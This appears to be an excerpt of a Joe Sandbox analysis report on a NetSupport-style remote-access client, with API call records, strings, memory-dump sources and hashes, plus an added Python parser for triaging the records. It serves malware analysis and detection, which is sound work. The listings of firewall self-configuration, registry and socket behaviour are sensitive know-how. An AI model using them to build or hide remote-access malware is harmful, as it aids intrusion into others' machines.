                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                        • String ID: ..\ctl32\Refcount.cpp$QueueThreadEvent
                                                        • API String ID: 1976012330-1024648535
                                                        • Opcode ID: e29206a9896a06f922e4cf0ceb9f136b07e2850f4e50c880c62728fdaeafb3db
                                                        • Instruction ID: 63fd93a488f830275771722d5aba5e66412ef535a9f58e0bfc3bcbadc2d60674
                                                        • Opcode Fuzzy Hash: e29206a9896a06f922e4cf0ceb9f136b07e2850f4e50c880c62728fdaeafb3db
                                                        • Instruction Fuzzy Hash: 2241A0B9E04614AFDB11DFA59C88B9BFBE4FB46708F10863EE816D7244E63595008B61
                                                        APIs
                                                        • CoInitialize.OLE32(00000000), ref: 11108FC5
                                                        • CoCreateInstance.OLE32(111AC5EC,00000000,00000001,111AC5FC,00000000,?,00000000,Client,silent,00000000,00000000,?,110489EB), ref: 11108FDF
                                                        • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11109004
                                                        • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11109016
                                                        • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11109029
                                                        • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11109035
                                                        • CoUninitialize.COMBASE(00000000), ref: 111090D1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$AddressCreateFreeInitializeInstanceLoadProcSettingsUninitialize
                                                        • String ID: SHELL32.DLL$SHGetSettings
                                                        • API String ID: 4195908086-2348320231
                                                        • Opcode ID: 6d34685f4c316705df0f1abe8123d38b31d7fd1e4502876d89345956c5a31854
                                                        • Instruction ID: 81cc2272e8ad22c1156deef73db3ee6d204820a72fecb0aa9db9e7dded57e48d
                                                        • Opcode Fuzzy Hash: 6d34685f4c316705df0f1abe8123d38b31d7fd1e4502876d89345956c5a31854
                                                        • Instruction Fuzzy Hash: 9A5161B5E002099FDB00DF95C9D4AAFFBB9EF88304F118569EA19A7244E731A941CB61
                                                        APIs
                                                          • Part of subcall function 11134660: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111346D0
                                                          • Part of subcall function 11134660: RegCloseKey.ADVAPI32(?), ref: 11134734
                                                        • _memset.LIBCMT ref: 111347B5
                                                        • GetVersionExA.KERNEL32(?,00000000,00000000), ref: 111347CE
                                                        • LoadLibraryA.KERNEL32(kernel32.dll), ref: 111347F5
                                                        • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11134807
                                                        • FreeLibrary.KERNEL32(00000000), ref: 1113481F
                                                        • GetSystemDefaultLangID.KERNEL32 ref: 1113482A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: Library$AddressCloseDefaultFreeLangLoadOpenProcSystemVersion_memset
                                                        • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                        • API String ID: 4251163631-545709139
                                                        • Opcode ID: def513b5bb341cc7afad5bcd91c09d54c4c598062c949e7b226e29cf6b61c9db
                                                        • Instruction ID: 437fe0f25426a0c81b88db6811d1175116249bb1d1675cf6c1db19aceed975f5
                                                        • Opcode Fuzzy Hash: def513b5bb341cc7afad5bcd91c09d54c4c598062c949e7b226e29cf6b61c9db
                                                        • Instruction Fuzzy Hash: 5C314539E502659FDB10CFB4C984B8AF7A4EB8933AF4001F9D829D3289CB344984CB91
                                                        APIs
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FFBD
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 1100FFE0
                                                        • std::bad_exception::bad_exception.LIBCMT ref: 11010064
                                                        • __CxxThrowException@8.LIBCMT ref: 11010072
                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 11010085
                                                        • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101009F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                        • String ID: bad cast
                                                        • API String ID: 2427920155-3145022300
                                                        • Opcode ID: 8f6f677ab330cd7586c2d26ea24e096535eb1e60d392ddb083f9221c613e5385
                                                        • Instruction ID: bf8c2c354690ba20c08e95df003a744cd7babc47bb895755038865195df53275
                                                        • Opcode Fuzzy Hash: 8f6f677ab330cd7586c2d26ea24e096535eb1e60d392ddb083f9221c613e5385
                                                        • Instruction Fuzzy Hash: 0C31D575E002569FCB16CF54C884B9EF7B4FB0572CF104169EC65AB688DB35AA00CB92
                                                        APIs
                                                          • Part of subcall function 11059580: __wcstoi64.LIBCMT ref: 110595BD
                                                          • Part of subcall function 1108F8C0: CoInitialize.OLE32(00000000), ref: 1108F8D4
                                                          • Part of subcall function 1108F8C0: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?), ref: 1108F8E7
                                                          • Part of subcall function 1108F8C0: CoCreateInstance.OLE32(?,00000000,00000001,111AC67C,?), ref: 1108F904
                                                          • Part of subcall function 1108F8C0: CoUninitialize.COMBASE ref: 1108F922
                                                        • _memset.LIBCMT ref: 111287B0
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105,00000001,00000000,00000000), ref: 111287C6
                                                        • _strrchr.LIBCMT ref: 111287D5
                                                        • _free.LIBCMT ref: 11128826
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                        • String ID: *AutoICFConfig$Client$ICFConfig2 returned 0x%x
                                                        • API String ID: 3753348462-81074719
                                                        • Opcode ID: d6a938e01ba48f2098115e7c25638f1083b752ba40fe7202dab8389a74f7b7bb
                                                        • Instruction ID: efd7c66bd05c6e10d55467fd07ad58ab98d8359d2b254dc54f01deb450eb345c
                                                        • Opcode Fuzzy Hash: d6a938e01ba48f2098115e7c25638f1083b752ba40fe7202dab8389a74f7b7bb
                                                        • Instruction Fuzzy Hash: D1213879E0061966D750DB649C06FDBF7A89F4670CF404198FE08A61C0EEF1AA80CAE1
                                                        APIs
                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11182A50), ref: 11133FFD
                                                        • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
                                                        • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B
                                                          • Part of subcall function 11027FB0: GetLastError.KERNEL32(?,00000000,?), ref: 11027FCC
                                                          • Part of subcall function 11027FB0: wsprintfA.USER32 ref: 11028017
                                                          • Part of subcall function 11027FB0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11028053
                                                          • Part of subcall function 11027FB0: ExitProcess.KERNEL32 ref: 11028069
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: FolderPath$ErrorExitFileLastMessageModuleNameProcesswsprintf
                                                        • String ID: ..\ctl32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                        • API String ID: 3494822531-1878648853
                                                        • Opcode ID: 79dec2e5e86b3296e7b7cbf95b33fee3af2b2340604abb3e6bf60fc7f45b26ba
                                                        • Instruction ID: cecf8e71dd9fb6e936cb624b8a237d093ff43f0dbaa42a0567fc90792f6e72d7
                                                        • Opcode Fuzzy Hash: 79dec2e5e86b3296e7b7cbf95b33fee3af2b2340604abb3e6bf60fc7f45b26ba
                                                        • Instruction Fuzzy Hash: 3351BA3AE5461A5BDB11CB249D14BDEFBB4AF80318F0001E4DCC977288DA71AA84CBD2
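The per-function records in this section (the RegOpenKeyExA call on HKLM\SOFTWARE\Productive Computer Insight\PCICTL under subcall 11134660, the two SHGetFolderPathA calls with CSIDL values 0x26 and 0x1A, the CoCreateInstance / LoadLibraryA lines with their embedded string arguments) are easier to triage once pulled out of the bullet layout into structured form. The parser below is an added example written for this page; it is not part of Joe Sandbox, of the IDA plugin, or of the analysed NetSupport client. It assumes the line shape seen in these records (bullet, optional "Part of subcall function" prefix, API.MODULE, optional argument list, ref address). The function names, the small HKEY/CSIDL lookup tables and the embedded excerpt (copied from the records above) are this example's own. Values listed beyond an API's real parameter count, such as the trailing 1110291B on the first SHGetFolderPathA line, appear to be stack slots rather than arguments, so the constant decoding is applied only at the parameter position each table belongs to and nothing else is interpreted.

```python
"""Parse the per-function "APIs" records of a Joe Sandbox text export.

Added example for this page; not Joe Sandbox, IDA plugin or NetSupport code.
The SAMPLE excerpt below is copied from the records on this page; the
function names and lookup tables are this example's own assumptions.
"""
import re
from typing import Dict, List, Optional

# Constructed excerpt: API lines copied verbatim from the records on this page.
SAMPLE = r"""
APIs
  • Part of subcall function 11134660: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Productive Computer Insight\PCICTL,00000000,00000100,?,00000000,00000000), ref: 111346D0
  • Part of subcall function 11134660: RegCloseKey.ADVAPI32(?), ref: 11134734
• GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11134807
• GetSystemDefaultLangID.KERNEL32 ref: 1113482A
• SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?,1110291B), ref: 1113403E
• SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 1113409B
• std::exception::exception.LIBCMT ref: 1110362A
• CoCreateInstance.OLE32(111AC5EC,00000000,00000001,111AC5FC,00000000,?,00000000,Client,silent,00000000,00000000,?,110489EB), ref: 11108FDF
"""

# One bullet line: optional subcall prefix, API name (may contain "::"),
# module after the last dot, optional "(args)", then the instruction address.
_API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<api>\S+?)\.(?P<module>[A-Z0-9]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)
_HEX = re.compile(r"^-?[0-9A-F]{8}$")  # 32-bit stack slot as printed by the plugin

# Well-known Win32 constants (values as defined in the Windows SDK).
HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
CSIDL = {0x1A: "CSIDL_APPDATA", 0x1C: "CSIDL_LOCAL_APPDATA", 0x23: "CSIDL_COMMON_APPDATA",
         0x24: "CSIDL_WINDOWS", 0x25: "CSIDL_SYSTEM", 0x26: "CSIDL_PROGRAM_FILES"}
# API name without the A/W suffix -> (parameter index to decode, lookup table)
_ARG_DECODERS = {"RegOpenKeyEx": (0, HKEYS), "RegCreateKeyEx": (0, HKEYS),
                 "SHGetFolderPath": (1, CSIDL), "SHGetSpecialFolderPath": (2, CSIDL)}


def decode_args(api: str, args: List[str]) -> Dict[int, str]:
    """Return {parameter index: symbolic name} for constants we can name."""
    base = api[:-1] if len(api) > 1 and api.endswith(("A", "W")) else api
    spec = _ARG_DECODERS.get(base)
    if not spec:
        return {}
    idx, table = spec
    if idx < len(args) and _HEX.match(args[idx]):
        name = table.get(int(args[idx], 16))
        if name:
            return {idx: name}
    return {}


def parse_api_lines(text: str) -> List[Dict[str, object]]:
    """Turn the bullet lines of an "APIs" record into dicts; skips other lines."""
    records: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = _API_LINE.match(line)
        if not m:
            continue
        raw_args: Optional[str] = m.group("args")
        # The report separates stack slots with commas; we keep that split as-is.
        args = [a.strip() for a in raw_args.split(",")] if raw_args is not None else []
        caller = m.group("caller")
        records.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,
            "ref": int(m.group("ref"), 16),
            "caller": int(caller, 16) if caller else None,
            "decoded": decode_args(m.group("api"), args),
        })
    return records


def extract_indicators(records: List[Dict[str, object]]) -> List[str]:
    """Collect every non-numeric, non-'?' argument: paths, DLL and export names."""
    seen: List[str] = []
    for rec in records:
        for a in rec["args"]:  # type: ignore[union-attr]
            if a == "?" or _HEX.match(a) or a in seen:
                continue
            seen.append(a)
    return seen


if __name__ == "__main__":
    for r in parse_api_lines(SAMPLE):
        print(f"{r['ref']:08X} {r['api']}.{r['module']} {r['args']} {r['decoded']}")
    print("indicators:", extract_indicators(parse_api_lines(SAMPLE)))
```

Run over a whole exported report, `extract_indicators` yields the string arguments (registry paths, DLL names, resolved export names) without the hex noise, and the `decoded` field turns 80000002 / 00000026 / 0000001A into HKEY_LOCAL_MACHINE / CSIDL_PROGRAM_FILES / CSIDL_APPDATA so the persistence-location checks in these records read at a glance.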
                                                        APIs
                                                          • Part of subcall function 11102970: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7774C3F0,?,1110371D,00000000,00000001,?,?,?,?,?,1102F49F), ref: 1110298E
                                                          • Part of subcall function 11102870: _malloc.LIBCMT ref: 11102889
                                                          • Part of subcall function 11102870: wsprintfA.USER32 ref: 111028A4
                                                          • Part of subcall function 11102870: _memset.LIBCMT ref: 111028C7
                                                        • LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,00000000,11177D16,000000FF), ref: 110FA8A3
                                                        • LoadLibraryA.KERNEL32(Advapi32.dll), ref: 110FA8EC
                                                        • std::exception::exception.LIBCMT ref: 110FA94E
                                                        • __CxxThrowException@8.LIBCMT ref: 110FA963
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        • Associated: 0000000B.00000002.3754555931.0000000011000000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111CD000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754755220.00000000111DC000.00000004.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.00000000111E1000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.000000001120E000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011210000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011213000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011215000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011241000.00000002.00000001.01000000.00000008.sdmp
                                                        • Associated: 0000000B.00000002.3754814766.0000000011332000.00000002.00000001.01000000.00000008.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: LibraryLoad$CreateEventException@8Throw_malloc_memsetstd::exception::exceptionwsprintf
                                                        • String ID: Advapi32.dll$Wtsapi32.dll
                                                        • API String ID: 2851125068-2390547818
                                                        • Opcode ID: 7b5a67d0d7e6fc342c5240c02ecf1f6de07eae797b0811734f0d9ddd45c46463
                                                        • Instruction ID: 76f8521da47cb9eef126f9e1764ac0a5dc6ee811a268475dced5a0fa713519db
                                                        • Opcode Fuzzy Hash: 7b5a67d0d7e6fc342c5240c02ecf1f6de07eae797b0811734f0d9ddd45c46463
                                                        • Instruction Fuzzy Hash: 0841F1B5C09B449EC761CF6A8980BDAFBE8FFA9604F00495ED5AEA3210D7787500CF65
                                                        APIs
                                                        • _calloc.LIBCMT ref: 6C81160B
                                                        • GetTickCount.KERNEL32 ref: 6C81165D
                                                        • InterlockedExchange.KERNEL32(-00039134,00000000), ref: 6C811668
                                                        • _calloc.LIBCMT ref: 6C811688
                                                        • _memmove.LIBCMT ref: 6C811696
                                                        • InterlockedDecrement.KERNEL32(-0003918C), ref: 6C8116CC
                                                        • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,937B54B7), ref: 6C8116D9
                                                          • Part of subcall function 6C8110C0: wsprintfA.USER32 ref: 6C811147
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                         • Associated: 0000000B.00000002.3755083319.000000006C800000.00000002.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755174428.000000006C847000.00000008.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755197287.000000006C848000.00000004.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755197287.000000006C84C000.00000004.00000001.01000000.0000000C.sdmp
                                                         • Associated: 0000000B.00000002.3755242929.000000006C84F000.00000002.00000001.01000000.0000000C.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID: Interlocked_calloc$CountDecrementEventExchangeTick_memmovewsprintf
                                                        • String ID:
                                                        • API String ID: 3178096747-0
                                                        • Opcode ID: fed8ba477ed2ee8269c56ed533f62f5e53b792cd63b4b2c97f690568db2dc26f
                                                        • Instruction ID: 2dd805cbc3e82c774394cb6a38eed57c01178da63f2cd172c5095af0a50311a8
                                                        • Opcode Fuzzy Hash: fed8ba477ed2ee8269c56ed533f62f5e53b792cd63b4b2c97f690568db2dc26f
                                                        • Instruction Fuzzy Hash: B64171B1D04209AFDB20CFA8C944AEFB7F8AB58304F44892AE505E7640E775DA44CBE0
                                                        APIs
                                                        Strings
                                                        • AutoICFConfig, xrefs: 11129770
                                                        • DoICFConfig() OK, xrefs: 111297F6
                                                        • Client, xrefs: 11129775
                                                        • DesktopTimerProc - Further ICF config checking will not be performed, xrefs: 1112980C
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CountTick
                                                        • String ID: AutoICFConfig$Client$DesktopTimerProc - Further ICF config checking will not be performed$DoICFConfig() OK
                                                        • API String ID: 536389180-1512301160
                                                        • Opcode ID: aff00621680e15bca7df80a477e2c46395d09f16941bc071ca53205ca28342e8
                                                        • Instruction ID: 786b3b8ff38a1ee801cdeddb6cd7e762267a6f84b7e4e6377bde446301b07f06
                                                        • Opcode Fuzzy Hash: aff00621680e15bca7df80a477e2c46395d09f16941bc071ca53205ca28342e8
                                                        • Instruction Fuzzy Hash: 0221C674E062FDADEF118E38AA88785FA8257403ADF54047DED1546288FBE45540CB91
                                                        APIs
                                                        • #16.WSOCK32(?,007C46C7,6C8119A4,00000000,00000000,6C8119A4,00000007,?,6C807C54,?,6C8119A4,00000001,00000000,-000391A4,6C8119A4), ref: 6C807BB1
                                                        Strings
                                                        • hbuf->buflen - hbuf->datalen >= min_bytes_to_read, xrefs: 6C807B93
                                                        • ReadSocket - Error %d reading response, xrefs: 6C807BE9
                                                        • e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c, xrefs: 6C807B8E
                                                        • ReadSocket - Connection has been closed by peer, xrefs: 6C807BCF
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3755108701.000000006C801000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C800000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_6c800000_client32.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ReadSocket - Connection has been closed by peer$ReadSocket - Error %d reading response$e:\nsmsrc\nsn\300\cva_300f1\ctl32\htctl.c$hbuf->buflen - hbuf->datalen >= min_bytes_to_read
                                                        • API String ID: 0-2647837471
                                                        • Opcode ID: 0d27cf2a4455b6e5b790ed44da2296d4b5b87c1b9a1ee6fe6289d00e1b3d877f
                                                        • Instruction ID: 91f4cb387d1b7520b011c73515db2cffb9fb0263c8b5624b0e9b5b6f07a5b1b8
                                                        • Opcode Fuzzy Hash: 0d27cf2a4455b6e5b790ed44da2296d4b5b87c1b9a1ee6fe6289d00e1b3d877f
                                                        • Instruction Fuzzy Hash: 210192777156046FF6209DBCFE40EA6B3D9EB94238F105C3AF90CC3B04E621E80542A0
                                                        APIs
                                                        • GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA), ref: 11024B66
                                                        • K32GetProcessImageFileNameA.KERNEL32(?,?,?,110FA74F,00000000,00000000,?,110F9A67,00000000,?,00000104), ref: 11024B82
                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 11024B96
                                                        • SetLastError.KERNEL32(00000078,110FA74F,00000000,00000000,?,110F9A67,00000000,?,00000104), ref: 11024BB9
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.3754579299.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_11_2_11000000_client32.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AddressProc$ErrorFileImageLastNameProcess
                                                        • String ID: GetModuleFileNameExA$GetProcessImageFileNameA
                                                        • API String ID: 4186647306-532032230
                                                        • Opcode ID: 84560621c8239c997dca9898e9568f965929ea78fcfc08c59426f9e676b42ff4
                                                        • Instruction ID: d3a79397b9aca74b41b2e47cdc2cb53976e07f1183ce263d33de4038ac76f0b1
                                                        • Opcode Fuzzy Hash: 84560621c8239c997dca9898e9568f965929ea78fcfc08c59426f9e676b42ff4
                                                        • Instruction Fuzzy Hash: 3C011B76B40614AFD721DEA5DC84F5BB7FCEB88665F01492AE985D6640D630E8008BA0
                                                        APIs
